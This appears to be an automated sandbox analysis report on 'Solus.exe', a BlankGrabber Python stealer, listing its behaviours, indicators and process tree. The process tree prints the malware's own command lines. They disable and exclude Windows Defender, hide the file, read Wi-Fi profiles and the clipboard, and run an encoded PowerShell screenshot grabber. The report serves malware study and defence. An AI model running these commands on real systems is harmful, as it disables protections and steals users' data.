Analysis Overview
SHA256
7e5dc3599c765066a0d9ddff8bef56ff27c8880355aa0691074667562194ab30
Threat Level: Known bad
The file Solus.exe was found to be: Known bad.
Malicious Activity Summary
A stealer written in Python and packaged with Pyinstaller
Blankgrabber family
Downloads MZ/PE file
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Reads user/profile data of web browsers
Loads dropped DLL
Executes dropped EXE
UPX packed file
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Hide Artifacts: Hidden Files and Directories
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
Suspicious use of FindShellTrayWindow
Views/modifies file attributes
Enumerates system info in registry
Gathers system information
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Runs ping.exe
Modifies data under HKEY_USERS
Kills process with taskkill
Enumerates processes with tasklist
Detects videocard installed
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-20 19:50
Signatures
A stealer written in Python and packaged with Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blankgrabber family
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-20 19:50
Reported
2024-06-20 20:20
Platform
win10v2004-20240611-en
Max time kernel
1334s
Max time network
1122s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Solus.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\Downloads\Solus.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI37602\rar.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Solus.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Solus.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI39082\rar.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133633866853674729" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Solus.exe
"C:\Users\Admin\AppData\Local\Temp\Solus.exe"
C:\Users\Admin\AppData\Local\Temp\Solus.exe
"C:\Users\Admin\AppData\Local\Temp\Solus.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solus.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solus.exe'
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Solus.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Solus.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\system32\netsh.exe
